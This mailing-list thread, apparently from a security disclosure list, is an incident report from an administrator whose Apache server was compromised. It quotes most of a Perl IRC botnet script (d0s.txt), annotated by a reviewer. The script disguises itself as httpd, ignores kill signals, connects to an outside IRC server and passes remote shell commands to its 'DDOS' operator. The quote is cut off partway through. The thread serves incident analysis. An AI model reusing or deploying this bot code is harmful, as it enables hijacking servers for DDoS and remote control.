Re: Apache hacks (./atac, d0s.txt)
Take a look at these links:
http://lists.virus.org/full-disclosure-0412/msg00541.html
http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html
Are your systems patched (apache)? Do you run any
application that might be vulnerable?
One thing I know is that this perl script is clearly
made by some brazilian people..
--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com
--- Andrew Y Ng <ayn@xxxxxxxxxxxx> escreveu:
> My server has been seeing some unusual activities
> today, I don't have much time
> to get down to the bottom of things, but after I
> investigated briefly I have
> decided to disable PERL executable permission for
> www-data (Apache process's
> user), also locked /var/tmp so www-data cannot write
> to it.
>
> Looks like it ignores all the `kill` signals, not
> sure how I can actually
> kill it...
>
>
> I found the included script in /var/tmp called
> d0s.txt.
>
> I found a bunch of processes called ./atac 20
> running, and found the
> following content in /tmp/atac:
>
> http://andrewng.com/tmp/atac.tbz
>
> here's d0s.txt:
>
> #!/usr/bin/perl
> # NOTE(review): comments marked "NOTE(review)" were added while reading this
> # sample; they describe only what the quoted code does. The original
> # Portuguese comments are paraphrased in English beside each setting.
> # No "use strict"/"use warnings" appears in the excerpt, so the undeclared
> # names below ($servidor, $sel_cliente, $IRC_cur_socket, ...) are package
> # globals.
> ################ CONFIGURACAO
>
#################################################################
> # NOTE(review): pt "process name that will appear in ps". Assigned to $0
> # further down, so ps/top show an Apache httpd command line instead of perl.
> my $processo = '/usr/local/apache/bin/httpd -DSSL';
> # Nome do processo que vai aparece no ps #
>
#----------------------------------------------################################################
> # NOTE(review): pt "bot mode" - presumably an IRC user-mode string; it is not
> # referenced anywhere in the visible excerpt.
> my $MODOME='+pi'; #
> Modo Do Bot #
>
#----------------------------------------------################################################
> # NOTE(review): pt "avoids flooding after X lines"; not referenced in the
> # visible excerpt.
> my $linas_max='10'; #
> Evita o flood :) depois de X linhas #
>
#----------------------------------------------################################################
> # NOTE(review): pt "it sleeps X seconds"; not referenced in the visible
> # excerpt.
> my $sleep='3'; # ele
> dorme X segundos #
> ##################### IRC
>
#####################################################################
> # NOTE(review): pt "administrator nick". parse() below only acts on PRIVMSGs
> # whose sender nick matches an entry here (case-insensitive), so this list is
> # the bot's whole authorisation check.
> my @adms=("DDOS"); # Nick do
> administrador #
>
#----------------------------------------------################################################
> # NOTE(review): pt "channels"; the code that joins them is not in the
> # visible excerpt.
> my @canais=("#bots ddos");# Canais
> #
>
#----------------------------------------------################################################
> # NOTE(review): pt "bot nick; if already in use it appears with a random
> # number at the end" (that fallback is implemented outside the excerpt).
> my $nick='b0t'; # Nick do
> bot. Caso esteja em uso vai aparecer #
> # #
> aparecer com numero radonamico no final #
>
#----------------------------------------------################################################
> # NOTE(review): pt "user id"; sent as the first field of the USER line in
> # conectar().
> my $ircname = 'b0t'; # User ID
> #
>
#----------------------------------------------################################################
> # NOTE(review): sent as the real-name field of the USER line in conectar().
> my $realname = '4Admin14: 4#DDOS';
> #
>
#----------------------------------------------################################################
> # NOTE(review): pt "IRC server to use when none is given on the command
> # line". Not declared with my: a package global, overridden by $ARGV[0]
> # below.
> $servidor='irc.gigachat.net' unless $servidor; #
> Servidor de irc que vai ser usado #
> # #
> caso não seja especificado no argumento #
>
#----------------------------------------------################################################
> # NOTE(review): pt "IRC server port".
> my $porta='6667'; # Porta do
> servidor de irc #
> ################ ACESSO A SHELL
>
###############################################################
> # NOTE(review): pt "1/0 enables/disables shell access". The visible part of
> # parse() calls shell() for admins without consulting this flag; any check
> # would be inside shell(), which is outside the excerpt.
> my $secv = 1; # 1/0
> pra habilita/desabilita acesso a shell #
>
###############################################################################################
>
> my $VERSAO = '1.0';
>
> # NOTE(review): INT, HUP and TERM are ignored, which is why an ordinary
> # kill (SIGTERM) or Ctrl-C has no effect on the running process. SIGKILL
> # (kill -9) and SIGSTOP cannot be caught or ignored, so they still work.
> # Ignoring CHLD means exited children are reaped automatically. "PS" is not a
> # standard signal name.
> $SIG{'INT'} = 'IGNORE';
> $SIG{'HUP'} = 'IGNORE';
> $SIG{'TERM'} = 'IGNORE';
> $SIG{'CHLD'} = 'IGNORE';
> $SIG{'PS'} = 'IGNORE';
>
> # NOTE(review): TCP socket, socket constants and select() wrapper used by
> # conectar() and the read loop below ("use" takes effect at compile time
> # regardless of where it sits in the file).
> use IO::Socket;
> use Socket;
> use IO::Select;
> # NOTE(review): leaves the directory it was launched from (the thread says
> # the script was found in /var/tmp), so the process no longer references it.
> chdir("/");
> # NOTE(review): first command-line argument overrides the IRC server.
> $servidor="$ARGV[0]" if $ARGV[0];
> # NOTE(review): rewrites the process title to $processo padded with NULs;
> # ps/top and /proc/<pid>/cmdline then show the fake httpd line. On Linux
> # /proc/<pid>/exe still points at the perl interpreter, which is a reliable
> # way to tell this process apart from a real httpd.
> $0="$processo"."\0"x16;;
> # NOTE(review): daemonises - the parent exits at once and the child carries
> # on, so the PID the launcher saw is not the one that keeps running. A
> # failed fork (undef) dies with the Portuguese message "problem with fork".
> my $pid=fork;
> exit if $pid;
> die "Problema com o fork: $!" unless defined($pid);
>
>
>
> # NOTE(review): per-connection state keyed by the socket (host, porta, nick,
> # meuip - filled in by conectar()); %DCC belongs to DCC::connections, which
> # is outside the excerpt.
> our %irc_servers;
> our %DCC;
> # NOTE(review): indirect-object "new ... ->new()" double call; not referenced
> # in the visible excerpt.
> my $dcc_sel = new IO::Select->new();
>
>
> # NOTE(review): select set holding the IRC socket(s); conectar() adds to it
> # and the main loop polls it with can_read(0).
> $sel_cliente = IO::Select->new();
> # NOTE(review): writes one raw IRC line terminated by "\n". With two
> # arguments ($#_ == 1, i.e. a socket and the text) it prints to that socket;
> # with one argument it prints to the global $IRC_cur_socket, which conectar()
> # and the read loop set to the connection currently being handled.
> sub sendraw {
> if ($#_ == '1') {
> my $socket = $_[0];
> print $socket "$_[1]\n";
> } else {
> print $IRC_cur_socket "$_[0]\n";
> }
> }
>
> # NOTE(review): opens a TCP connection to ($servidor_con, $porta_con), makes
> # it the current socket, records it in $sel_cliente and %irc_servers, then
> # registers with NICK (via nick(), defined outside the excerpt) and USER.
> # On connect failure the "or return(1)" fires, so the function returns 1 and
> # the defined() test below is only reached with a live socket; the caller
> # (the main loop) ignores the return value. Sleeps 1 s after registering;
> # a failed connect returns without any delay.
> # This $meunick is lexical to conectar(); the $meunick read by parse() is the
> # global assigned in the main loop.
> sub conectar {
> my $meunick = $_[0];
> my $servidor_con = $_[1];
> my $porta_con = $_[2];
>
> my $IRC_socket =
> IO::Socket::INET->new(Proto=>"tcp",
> PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
> return(1);
> if (defined($IRC_socket)) {
> # NOTE(review): global used by sendraw() when called with one argument.
> $IRC_cur_socket = $IRC_socket;
>
> $IRC_socket->autoflush(1);
> $sel_cliente->add($IRC_socket);
>
> # NOTE(review): %irc_servers is keyed by the stringified socket reference.
> $irc_servers{$IRC_cur_socket}{'host'} =
> "$servidor_con";
> $irc_servers{$IRC_cur_socket}{'porta'} =
> "$porta_con";
> $irc_servers{$IRC_cur_socket}{'nick'} =
> $meunick;
> $irc_servers{$IRC_cur_socket}{'meuip'} =
> $IRC_socket->sockhost;
> # NOTE(review): USER <ircname> <local ip> <server> :<realname>, built from
> # the config values at the top of the file.
> nick("$meunick");
> sendraw("USER $ircname
> ".$IRC_socket->sockhost." $servidor_con
> :$realname");
> sleep 1;
> }
>
> }
> # NOTE(review): carries an incomplete trailing line from one sysread() to
> # the next so it can be completed before parse() sees it.
> my $line_temp;
> # NOTE(review): main event loop; it never exits on its own (signals are
> # ignored above). Reconnects whenever no server is known, then polls the
> # socket set with a zero timeout and "next"s when nothing is ready, so an
> # idle bot spins on the CPU instead of blocking.
> while( 1 ) {
> # NOTE(review): a failed connect returns without delay, so this retries in
> # a tight loop until conectar() succeeds.
> while (!(keys(%irc_servers))) { conectar("$nick",
> "$servidor", "$porta"); }
> # NOTE(review): removes a possible empty-string key, which would otherwise
> # count as a known server and stop the reconnect loop above from firing.
> delete($irc_servers{''}) if
> (defined($irc_servers{''}));
> # NOTE(review): DCC::connections is defined outside the excerpt; the
> # ampersand call form without parens passes the current @_ through.
> &DCC::connections;
> my @ready = $sel_cliente->can_read(0);
> next unless(@ready);
> foreach $fh (@ready) {
> # NOTE(review): globals consumed by sendraw() and parse().
> $IRC_cur_socket = $fh;
> $meunick =
> $irc_servers{$IRC_cur_socket}{'nick'};
> $nread = sysread($fh, $msg, 4096);
> # NOTE(review): 0 means EOF; an undef (error) return also compares == 0
> # and is handled the same way. The socket is dropped but there is no
> # "next", so the split below still runs on $msg.
> if ($nread == 0) {
> $sel_cliente->remove($fh);
> $fh->close;
> delete($irc_servers{$fh});
> }
> @lines = split (/\n/, $msg);
>
> # NOTE(review): every line but the last is complete and parsed at once.
> # The last fragment is parsed only if it was the sole line, ends in "\r",
> # or is a server "NOTICE AUTH :***" banner; otherwise it is held in
> # $line_temp and prepended to the first line of the next read.
> for(my $c=0; $c<= $#lines; $c++) {
> $line = $lines[$c];
> $line=$line_temp.$line if ($line_temp);
> $line_temp='';
> $line =~ s/\r$//;
> unless ($c == $#lines) {
> parse("$line");
> } else {
> if ($#lines == 0) {
> parse("$line");
> } elsif ($lines[$c] =~ /\r$/) {
> parse("$line");
> } elsif ($line =~ /^(\S+) NOTICE AUTH
> :\*\*\*/) {
> parse("$line");
> } else {
> $line_temp = $line;
> }
> }
> }
> }
> }
>
>
>
> sub parse {
> my $servarg = shift;
> if ($servarg =~ /^PING \:(.*)/) {
> sendraw("PONG :$1");
> } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
> PRIVMSG (.+?) \:(.+)/) {
> my $pn=$1; my $onde = $4; my $args = $5;
> if ($args =~ /^\001VERSION\001$/) {
> notice("$pn", "\001Bot powered by DDOS
> TEAM\001");
> }
> if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
> if ($onde eq "$meunick"){
> shell("$pn", "$args");
> }
> if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
> ) {
>
=== message truncated ===